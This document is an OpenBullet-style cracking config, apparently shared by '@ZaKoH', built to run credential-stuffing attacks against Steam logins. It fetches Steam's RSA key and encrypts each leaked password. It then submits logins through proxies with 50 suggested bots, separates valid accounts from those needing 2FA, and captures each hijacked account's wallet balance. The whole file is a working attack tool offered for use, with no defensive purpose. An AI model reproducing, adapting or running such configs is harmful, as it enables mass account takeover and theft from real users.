[SETTINGS]
{
  "Name": "Steam_@ZaKoH",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-07-23T06:45:55.847264+08:00",
  "AdditionalInfo": "",
  "Author": "@ZaKoH",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://help.steampowered.com/en/login/getrsakey/" 
  CONTENT "username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: help.steampowered.com" 
  HEADER "Origin: https://help.steampowered.com" 
  HEADER "Referer: https://help.steampowered.com/en/wizard/Login?redir=%2Fen%2F" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Ppublickey_mod PARSE "<SOURCE>" LR "publickey_mod\":\"" "\"," -> VAR "publickey_mod" 

#publickey_exp PARSE "<SOURCE>" LR "publickey_exp\":\"" "\"," -> VAR "publickey_exp" 

#timestamp PARSE "<SOURCE>" LR "\",\"timestamp\":\"" "\",\"" -> VAR "timestamp" 

#PASS2 FUNCTION RSA "<publickey_mod>" "<publickey_exp>" "<PASS>" -> VAR "PASS2" 

#PASS3 FUNCTION URLEncode "<PASS2>" -> VAR "PASS3" 

REQUEST POST "https://help.steampowered.com/en/login/dologin/" 
  CONTENT "password=<PASS3>&username=<USER>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=<timestamp>&remember_login=false" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: help.steampowered.com" 
  HEADER "Origin: https://help.steampowered.com" 
  HEADER "Referer: https://help.steampowered.com/en/wizard/Login?redir=%2Fen%2F" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The account name or password that you have entered is incorrect" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "requires_twofactor\":true" 
    KEY "emailauth_needed\":true" 
  KEYCHAIN Success OR 
    KEY "success\":true" 

REQUEST GET "https://store.steampowered.com/account/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Balance PARSE "<SOURCE>" LR "class=\"accountData price\">" "</div>" -> CAP "Balance" 

